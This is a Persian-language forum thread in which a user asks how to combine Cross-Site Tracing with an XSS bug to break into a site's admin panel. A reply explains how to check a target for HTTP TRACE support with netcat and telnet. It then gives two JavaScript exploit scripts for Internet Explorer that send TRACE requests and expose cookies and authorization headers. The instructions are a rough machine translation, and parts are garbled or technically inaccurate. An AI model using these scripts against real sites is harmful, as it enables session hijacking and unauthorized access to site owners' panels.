سوال در مورد کاربرد XST و نحوه استفاده از آن در باگ xss

[hajsajjad 0]

سلام

 چطور میشه از XST  با کمک باگ xss  دسترسی گرفت؟

آیا راهی بجز کوکی گرابر برای زدن سایت دارای باگ  xss سراغ دارید، برای دسترسی به پنل نه حملات ddos و dos ؟

[Mr.Nashena3 276]

با سلام

اول بد نیست بگم ک اسم کاملش هست Cross-Site-Tracing ک به XST  یا CST معروف هست

XST  یا CST یک فرم پیچیده از اسکریپت های  (XSS) است که می تواند مانع از اقدامات امنیتی که قبلا برای محافظت در برابر XSS ایجاد شده است را کنار بگذارد. این شکل جدید حمله به نفوذگر اجازه می دهد کوکی ها و سایر اطلاعات احراز هویت را با استفاده از یک اسکریپت ساده در سمت سرویس گیرنده بدست آورد.

به منظور محافظت از XST، کاربران اینترنت می توانند جاوا اسکریپت یا اکتیو ایکس را در مرورگرهای خود غیرفعال کنند.

آموزش

آیا هدف از HTTP TRACE پشتیبانی می کند؟

- با NetCat

 برای دانستن بر روی دستگاه لینوکس خود بروید و NETCAT را دانلود کنید. سپس، دستور زیر را دوست دارید

nc www.target.com 80

چیزی شبیه به این باید بازگردانده شود

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:00:29 GMT
Connection: close
Allow: GET, HEAD, POST, TRACE, OPTIONS
Content-Length: 0

همانطور که در خط 5 دیده می شود، TRACE پشتیبانی می شود.

با Telnet

فقط این دستور را وارد کنید

telnet www.target.com 80

 

اگر در گزارش مشاهده کنید خط "TRACE:yes"، بنابراین فعال شده است.

 

با RESTClient (افزودنی فایرفاکس).

لینک دانلود: https://addons.mozilla.org/

Exploitation

هدف این است که برای وارد کردن یک اسکریپت XST (= request) در یک صفحه وب Target به عنوان یک روش POST.
 یک مثال:

<script type=”text/javascript”>
[b]<!--[/b]
function sendTrace () {
    var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);
    xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false);
    xmlHttp.send();
    xmlDoc=xmlHttp.responseText;
    alert(xmlDoc);
}
//-->
</script>
<INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>

 

توضیحات این اسکریپت را که شما می توانید در زیر ببینید :

var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”);  Object ایجاد می کند

xmlHttp.open(“TRACE”, “INSERT_YOUR_URL_HERE”,false); نوع درخواست، URL را مشخص می کند و اگر درخواست باید به صورت غیر همزمان انجام شود یا نه.

روش: نوع درخواست - GET یا POST
url: محل فایل در سرور
async: true (ناهمزمان) یا false (همگام)

xmlHttp.send(); برای انتقال اطلاعات به سرور استفاده می شود

xmlDoc=xmlHttp.responseText; داده های پاسخ را به عنوان یک رشته دریافت کنید

alert(xmlDoc); نمایش محتوای XML با استفاده از جاوا اسکریپت

<INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>یک دکمه را ایجاد می کند. برای بازگرداندن، اسکریپت هنگام کلیک بر روی آن شروع می شود.

اسکریپت دیگر، که برای XST بهتر است:

<script type=”text/javascript”>
function xssDomainTraceRequest(){
var exampleCode = “var xmlHttp = new ActiveXObject(\”Microsoft.XMLHTTP\”)\;xmlHttp.open(\”TRACE\”,\”INSERT_YOUR_URL_HERE\”,false)\
;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;”;
var target = “INSERT_YOUR_URL_HERE”;
cExampleCode = encodeURIComponent(exampleCode  + ‘;top.close()’);
var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’;
showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie 
Information Using TRACE”>

توضیحات بعضی از دستورات (خب صادقانه، من توضیح نمی دم - برای اسکریپت اول ساده تر بود):

توجه داشته باشید که بخشی از داده هایی که دریافت می کنید (مانند پارامتر مجوز) در BASE64 کد گذاری می شود.
شما می توانید تن از رمزگشایی های BASE64 را پیدا کنید، اما من این را توصیه می کنم:  https://www.base64decode.org/

شما باید یک classic JS window داشته باشید که وقتی کد اسکریپت را می بینید ظاهر می شود. در حال حاضر، تفاوت های زیادی با XSS نمی بینید.